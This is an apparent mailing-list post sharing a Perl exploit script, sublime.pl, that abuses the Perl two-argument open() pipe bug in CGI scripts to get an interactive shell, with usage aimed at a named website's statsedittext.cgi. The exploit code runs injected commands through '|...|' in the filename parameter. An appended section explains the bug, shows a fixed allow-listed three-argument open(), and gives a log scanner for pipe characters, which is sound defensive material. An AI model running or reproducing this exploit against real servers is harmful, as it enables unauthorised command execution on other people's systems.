<div>This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it&#39;ll drop you at a shell.  When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-).  I know this is pretty easy stuff, it works off those vulns that can just be exploited with a web browser, but this gives you a shell.  So have at it guys &amp; gals!  Had to resend because I got some message about my attachment being blocked.  Not sure if it really was, though, I&#39;ll send again anyway.  Hope this isn&#39;t spamming the list. =/</div>
<div><br></div><div>Site: <a href="http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&amp;desc=Stat+File">http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&amp;desc=Stat+File</a></div>
<div>Usage: ./sublime.pl &quot;<a href="http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=">http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=</a>&quot; &quot;&amp;desc=Stat+File&quot;</div>
<div><br></div><div>Should work on most perl cgi scripts that are vulnerable to the | read bug.  Please note, it&#39;s not a &quot;real&quot; shell, but almost everything works, except things that won&#39;t go in one instance like cd-ing and env vars, etc.</div>
<div><br></div><div>Play nice!</div><div><br></div><div>--oxagast</div><div><br></div><div>[CODE]</div>
<pre>
#!/usr/bin/perl

# adaptive cgi shell by oxagast

use LWP::Simple;
$part1 = $ARGV[0]; $part2 = $ARGV[1];
print &quot;Making buffer...\n&quot;;
# numbered marker lines, used later to find where the CGI puts our output
for $bet (100..200) {
    $bettwo = $bettwo . &quot;AAAA&quot; . $bet . &quot;AAAA\\\\n&quot;;
}
print &quot;Exploiting...\n&quot;;
$id = get(&quot;$part1|id|$part2&quot;);
$id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
print &quot;Well shizzle my nizzle... shell by oxagast... use wisely ;)\n\n&quot;;
$uid = $1;
print &quot;$uid\n&quot;;
while (0 == 0) {
    print &quot;\$ &quot;;
    $cmd = &lt;STDIN&gt;;
    chomp($cmd);
    # every request is a fresh process, so the working directory is tracked here
    if ($cmd =~ m/cd (\/.*)/) {
        $dir = $1;
    }
    if ($cmd eq &quot;cd ..&quot;) {
        $dir =~ s/(.*)\/.*/\/$1/;
    }
    if ($cmd eq &quot;pwd&quot;) {
        $dirjunk = $dir;
        if ($dirjunk eq &quot;//&quot;) {
            $dirjunk = &quot;/&quot;;
        }
    }
    $dirjunk = &quot;cd $dir;$cmd&quot;;
    # hex-encode the command line so echo -e can rebuild it on the other side
    $cmdhex = unpack(&quot;H*&quot;,&quot;$dirjunk &amp;&gt;/tmp/cmdlnerr&quot;);
    $cmdhex =~ s/(..)/\\\\x$1/g;
    get(&quot;$part1|echo -e $bettwo &gt; /tmp/buff|$part2&quot;);
    $backjunk2 = get(&quot;$part1|cat /tmp/buff|$part2&quot;);
    @backjunk = split(&quot;\n&quot;, $backjunk2);
    get(&quot;$part1|echo -e \&quot;$cmdhex\&quot; &gt; /tmp/cmdln|$part2&quot;);
    get(&quot;$part1|/bin/sh /tmp/cmdln &gt; /tmp/cmdlerr|$part2&quot;);
    $backjunk_as = get(&quot;$part1|cat /tmp/cmdlnerr|$part2&quot;);
    @backjunk_split = split(&quot;\n&quot;, $backjunk_as);
    $backjunk_wcl = get(&quot;$part1|wc -l /tmp/cmdlnerr|$part2&quot;);
    $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
    $thismanylines = $1 - 1;
    # strip whatever the CGI wraps around each line, using the marker lines as a template
    for $junknum (0..$#backjunk_split) {
        for $fuzz (10..100+$thismanylines) {
            if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
                $middle = $1;
                $backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
                $backjunk_split[$junknum] =~ s/$1//;
                $backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
                $backjunk_split[$junknum] =~ s/$1//;
                print &quot;$backjunk_split[$junknum]\n&quot;;
            }
        }
    }
}
</pre>
<div>[/CODE]</div>
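<div>An added example, not part of oxagast's post or of the sublime.pl code above: the bug this script relies on is Perl's two-argument open(), which treats a '|' at either end of the file name as a pipe and hands the rest to the shell. The Perl below shows that vulnerable open() shape next to a fixed version that allow-lists the filename parameter and uses three-argument open(), plus a small access-log scanner that flags requests carrying a raw or percent-encoded '|' in a query parameter. The stats file, directory and log lines are constructed for the demo; the CGI path and parameter names are taken from the post.</div>

```perl
#!/usr/bin/perl
# Added example (not from oxagast's post): Perl's two-argument open() and
# how to close and detect the "pipe read" bug. Everything here is constructed
# for the demo; no network access is made.
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

my $base = tempdir(CLEANUP => 1);   # stands in for the CGI's document root

# VULNERABLE shape (shown for contrast, never called with untrusted data):
# two-argument open() parses the string itself. A trailing '|' runs everything
# before it as a shell command and reads its output; a leading '|' pipes into
# a command. So filename=|id| turns "read this file" into "run id".
sub read_stats_vulnerable {
    my ($filename) = @_;
    open(STATS, "$base/$filename") or return undef;   # the bug
    local $/;
    my $data = readline(STATS);
    close(STATS);
    return $data;
}

# SAFE shape: allow-list the parameter, then three-argument open() with a
# fixed mode, so '|', '<' and '>' in the name are just characters.
sub read_stats_safe {
    my ($filename) = @_;
    my ($name) = $filename =~ m{\A stats/ ([A-Za-z0-9_\-]+ \.htm) \z}x
        or return (undef, 'rejected: filename not in allow-list');
    my $path = File::Spec->catfile($base, 'stats', $name);
    open(my $fh, '<', $path) or return (undef, "open failed: $!");
    local $/;
    my $data = readline($fh);
    close($fh);
    return ($data, undef);
}

# Defender side: decode each query parameter and flag open()-mode
# metacharacters. '|' is the one this post abuses; '<' and '>' are the
# other two-argument open() mode prefixes.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

sub suspicious_params {
    my ($request_line) = @_;
    my ($query) = $request_line =~ /\?([^\s"]*)/ or return ();
    my @hits;
    for my $pair (split /&/, $query) {
        my ($k, $v) = split /=/, $pair, 2;
        $v = url_decode($v // '');
        push @hits, $k if $v =~ /[|<>]/;
    }
    return @hits;
}

# --- demo -------------------------------------------------------------
mkdir File::Spec->catdir($base, 'stats') or die "mkdir: $!";
open(my $out, '>', File::Spec->catfile($base, 'stats', 'demo.htm')) or die $!;
print $out "constructed stats page\n";
close($out);

for my $param ('stats/demo.htm', 'stats/demo.htm|id|', '|id|', 'stats/../demo.htm') {
    my ($data, $err) = read_stats_safe($param);
    printf "%-22s -> %s\n", $param,
        defined $data ? 'served ' . length($data) . ' bytes' : $err;
}

# constructed access-log lines in Apache common log format
my @log = (
    '10.0.0.5 - - [01/Jan/2000:00:00:00 +0000] "GET /cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File HTTP/1.0" 200 5120',
    '10.0.0.9 - - [01/Jan/2000:00:00:01 +0000] "GET /cgi-bin/statsedittext.cgi?filename=%7Cid%7C&desc=Stat+File HTTP/1.0" 200 312',
);
for my $line (@log) {
    my @bad = suspicious_params($line);
    print "ALERT open() metacharacter in parameter(s) [@bad]: $line\n" if @bad;
}
```

<div>Run it with plain perl: the legitimate name is served, the two pipe-bearing names and the traversal attempt are rejected, and the second log line is flagged on its filename parameter. Note that three-argument open() alone only removes the pipe interpretation; it is the allow-list that keeps the parameter confined to one directory and one file type.</div>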